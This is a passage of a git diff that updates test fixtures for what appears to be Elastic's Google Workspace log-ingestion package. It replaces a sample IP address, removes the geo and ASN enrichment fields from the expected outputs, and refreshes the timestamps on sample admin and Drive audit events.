+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RENAME_USER\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "RENAME_USER",
 "id": "1",
@@ -5780,7 +4592,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -5804,35 +4616,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301345900Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_STRONG_AUTH\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005176800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_STRONG_AUTH\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "UNENROLL_USER_FROM_STRONG_AUTH",
 "id": "1",
@@ -5869,7 +4663,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -5893,35 +4687,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301347700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005182200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "SUSPEND_USER",
 "id": "1",
@@ -5958,7 +4734,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -5982,35 +4758,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301349500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005187500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "UNARCHIVE_USER",
 "id": "1",
@@ -6047,7 +4805,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -6071,35 +4829,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301351100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNDELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005192800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNDELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "UNDELETE_USER",
 "id": "1",
@@ -6136,7 +4876,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -6160,35 +4900,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301352800Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNSUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005198200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNSUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "UNSUSPEND_USER",
 "id": "1",
@@ -6225,7 +4947,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -6249,35 +4971,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301354500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPGRADE_USER_TO_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005203500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPGRADE_USER_TO_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "UPGRADE_USER_TO_GPLUS",
 "id": "1",
@@ -6313,7 +5017,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -6337,35 +5041,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301356200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"0\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005208800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"0\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"}]}}",
 "provider": "admin",
 "action": "USERS_BULK_UPLOAD",
 "id": "1",
@@ -6396,7 +5082,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -6420,35 +5106,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301357800Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005214200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "USERS_BULK_UPLOAD_NOTIFICATION_SENT",
 "id": "1",
diff --git a/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log b/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log
index 3cd073a7379..aa82eee6fe5 100644
--- a/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log
+++ b/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log 
@@ -1,28 +1,28 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"add_to_folder","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_canceled","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_comment_added","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_requested","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_reviewer_responded","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"create","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"delete","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"download","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"edit","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"add_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"move","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"preview","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"print","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"remove_from_folder","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"rename","parameters":[{"name":"billable","boolValue":true},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"bar.gif"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_value","value":"foo.gif","new_value":"bar.gif"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"untrash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"sheets_import_range","parameters":[{"name":"sheets_import_range_recipient_doc","value":"1234"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"trash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"remove_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
